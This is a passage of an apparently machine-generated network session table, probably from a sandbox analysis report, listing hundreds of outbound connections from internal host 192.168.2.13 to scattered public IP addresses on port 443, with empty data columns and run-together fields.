                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20051192.168.2.1357792220.251.150.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20052192.168.2.134040650.111.226.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20053192.168.2.1341770134.19.206.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20054192.168.2.135382695.250.29.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20055192.168.2.1347856145.98.8.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20056192.168.2.135575099.218.86.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20057192.168.2.1340998126.175.91.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20058192.168.2.134278060.39.47.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20059192.168.2.135446863.204.116.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20060192.168.2.134412870.199.236.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20061192.168.2.1355838219.26.70.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20062192.168.2.133406288.111.169.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20063192.168.2.1333208117.112.87.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20064192.168.2.13333108.184.150.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20065192.168.2.1353910164.94.186.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20066192.168.2.133913083.228.247.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20067192.168.2.1336548179.74.15.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20068192.168.2.133373823.76.173.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20069192.168.2.135133289.108.80.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20070192.168.2.1350592154.112.148.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20071192.168.2.133472875.177.78.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20072192.168.2.1338346213.157.16.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20073192.168.2.133863238.11.23.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20074192.168.2.133744471.224.79.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20075192.168.2.135543242.40.49.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20076192.168.2.133656254.72.22.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20077192.168.2.1345858144.174.161.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20078192.168.2.134779461.98.103.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20079192.168.2.135236875.199.118.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20080192.168.2.1336918111.250.172.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20081192.168.2.135903243.224.84.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20082192.168.2.133753476.133.126.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20083192.168.2.1343732111.43.217.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20084192.168.2.134873081.203.60.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20085192.168.2.135317690.170.211.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20086192.168.2.134223291.148.246.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20087192.168.2.134279474.22.39.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20088192.168.2.1336110106.58.101.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20089192.168.2.1340494173.170.143.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20090192.168.2.1355564153.101.56.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20091192.168.2.1335222223.34.165.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20092192.168.2.1360990148.185.159.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20093192.168.2.1345406178.216.149.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20094192.168.2.134295060.158.108.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20095192.168.2.1343040137.25.191.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20096192.168.2.134271014.243.13.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20097192.168.2.135376684.134.211.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20098192.168.2.1342268146.45.33.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20099192.168.2.1347448131.181.137.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20100192.168.2.133476452.41.183.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20101192.168.2.135790051.70.33.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20102192.168.2.135288847.232.48.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20103192.168.2.1348474101.109.142.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20104192.168.2.133514469.241.83.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20105192.168.2.13572964.35.16.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20106192.168.2.133799895.174.50.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20107192.168.2.133560417.197.141.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20108192.168.2.1336136104.19.64.698080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20109192.168.2.13399309.41.130.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20110192.168.2.133351282.222.102.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20111192.168.2.1351422152.64.82.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20112192.168.2.135629663.123.59.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20113192.168.2.134202867.215.105.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20114192.168.2.1334318152.179.132.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20115192.168.2.1349954155.158.80.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20116192.168.2.134024274.175.69.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20117192.168.2.133652494.12.191.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20118192.168.2.1344996206.79.115.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20119192.168.2.1354070200.62.94.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20120192.168.2.1356326221.61.74.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20121192.168.2.134867247.192.240.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20122192.168.2.13479909.207.114.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20123192.168.2.1344044108.95.127.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20124192.168.2.135588264.69.86.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20125192.168.2.1339002171.59.68.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20126192.168.2.135989464.250.85.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20127192.168.2.135387292.185.74.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20128192.168.2.135741237.224.195.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20129192.168.2.1335408103.67.126.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20130192.168.2.1359526223.199.29.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20131192.168.2.1353066135.190.72.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20132192.168.2.1350010119.162.94.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20133192.168.2.134427695.216.175.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20134192.168.2.134085650.64.205.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20135192.168.2.13562308.212.184.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20136192.168.2.135348623.250.66.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20137192.168.2.1345150211.212.26.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20138192.168.2.1353542143.79.168.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20139192.168.2.1355856178.209.174.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20140192.168.2.134323825.150.90.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20141192.168.2.133920475.165.121.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20142192.168.2.1334808191.81.127.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20143192.168.2.134748249.239.5.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20144192.168.2.135433865.242.209.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20145192.168.2.1342380185.24.166.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20146192.168.2.1341612156.89.240.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20147192.168.2.1354750144.131.197.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20148192.168.2.134472417.23.110.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20149192.168.2.1339252158.168.224.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20150192.168.2.1358552193.102.141.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20151192.168.2.1343602147.104.131.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20152192.168.2.1354696155.4.220.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20153192.168.2.1357746190.137.11.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20154192.168.2.134355651.178.98.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20155192.168.2.1332794221.106.39.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20156192.168.2.134034645.180.71.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20157192.168.2.1357102198.187.202.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20158192.168.2.133474061.117.121.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20159192.168.2.1335446171.139.64.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20160192.168.2.1336254108.51.122.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20161192.168.2.135497059.255.46.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20162192.168.2.1337330102.54.189.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20163192.168.2.1358014138.108.11.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20164192.168.2.135972038.169.216.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20165192.168.2.13333561.194.173.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20166192.168.2.135177442.49.72.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20167192.168.2.1342102171.135.110.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20168192.168.2.133803887.23.5.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20169192.168.2.1342802195.21.133.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20170192.168.2.133842819.72.217.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20171192.168.2.1351228106.81.18.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20172192.168.2.1351046156.221.138.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20173192.168.2.134086895.126.122.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20174192.168.2.1351614201.3.95.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20175192.168.2.133643079.202.121.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20176192.168.2.1358344118.129.163.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20177192.168.2.1355798171.25.195.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20178192.168.2.135058640.178.17.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20179192.168.2.134173891.131.133.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20180192.168.2.134244613.58.20.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20181192.168.2.135530683.128.152.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20182192.168.2.1354210114.48.66.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20183192.168.2.1347204163.248.161.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20184192.168.2.133437868.128.48.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20185192.168.2.135966084.70.102.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20186192.168.2.1346068213.89.151.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20187192.168.2.135308419.139.206.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20188192.168.2.1345608145.67.233.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20189192.168.2.1358900135.124.4.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20190192.168.2.1337248108.174.132.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20191192.168.2.134875432.162.118.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20192192.168.2.133961868.150.248.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20193192.168.2.1339850220.54.91.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20194192.168.2.1343462195.184.181.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20195192.168.2.1345478104.120.238.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20196192.168.2.133913839.43.38.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20197192.168.2.1344126206.165.81.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20198192.168.2.133998241.185.55.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20199192.168.2.133869493.135.93.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20200192.168.2.133475418.245.32.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20201192.168.2.134048436.228.110.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20202192.168.2.1356270217.222.33.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20203192.168.2.1348182115.119.82.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20204192.168.2.1358784213.11.31.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20205192.168.2.1348272180.173.74.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20206192.168.2.1340116115.54.183.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20207192.168.2.135251681.22.141.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20208192.168.2.135544289.110.101.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20209192.168.2.134156039.12.184.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20210192.168.2.1334328187.240.89.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20211192.168.2.133335276.80.96.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20212192.168.2.133912014.63.208.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20213192.168.2.133906081.211.74.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20214192.168.2.134738612.214.115.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20215192.168.2.133285275.113.132.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20216192.168.2.135495841.182.160.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20217192.168.2.1360630166.85.252.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20218192.168.2.135742279.35.76.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20219192.168.2.133830671.122.63.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20220192.168.2.134912086.209.98.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20221192.168.2.1355188144.47.42.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20222192.168.2.1346696184.52.57.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20223192.168.2.135821281.156.120.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20224192.168.2.1339798138.63.233.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20225192.168.2.1339844101.203.224.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20226192.168.2.1338764209.128.13.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20227192.168.2.1356386147.39.114.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20228192.168.2.134792058.165.235.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20229192.168.2.1354378172.224.243.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20230192.168.2.1334240149.72.73.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20231192.168.2.133510882.219.110.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20232192.168.2.134718024.70.178.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20233192.168.2.135794263.186.14.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20234192.168.2.1333834104.223.56.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20235192.168.2.1360870177.44.252.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20236192.168.2.133565294.4.170.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20237192.168.2.1344298113.61.18.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20238192.168.2.1347358208.228.194.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20239192.168.2.1338578114.195.193.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20240192.168.2.134758666.20.33.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20241192.168.2.135127027.226.106.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20242192.168.2.1339728119.40.109.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20243192.168.2.1352542134.16.149.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20244192.168.2.1353076220.99.194.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20245192.168.2.1341928165.216.15.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20246192.168.2.1338632146.228.28.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20247192.168.2.1346168124.109.142.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20248192.168.2.134196467.185.112.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20249192.168.2.1351354123.207.34.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20250192.168.2.1341744168.211.216.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20251192.168.2.1355246172.224.168.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20252192.168.2.133520271.157.66.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20253192.168.2.1337494185.233.126.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20254192.168.2.135907877.191.48.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20255192.168.2.13414509.171.119.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20256192.168.2.1345254202.47.19.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20257192.168.2.1355710222.68.81.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20258192.168.2.135335065.231.233.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20259192.168.2.135523666.83.198.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20260192.168.2.1345010163.133.201.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20261192.168.2.1353854216.64.143.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20262192.168.2.134388088.111.174.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
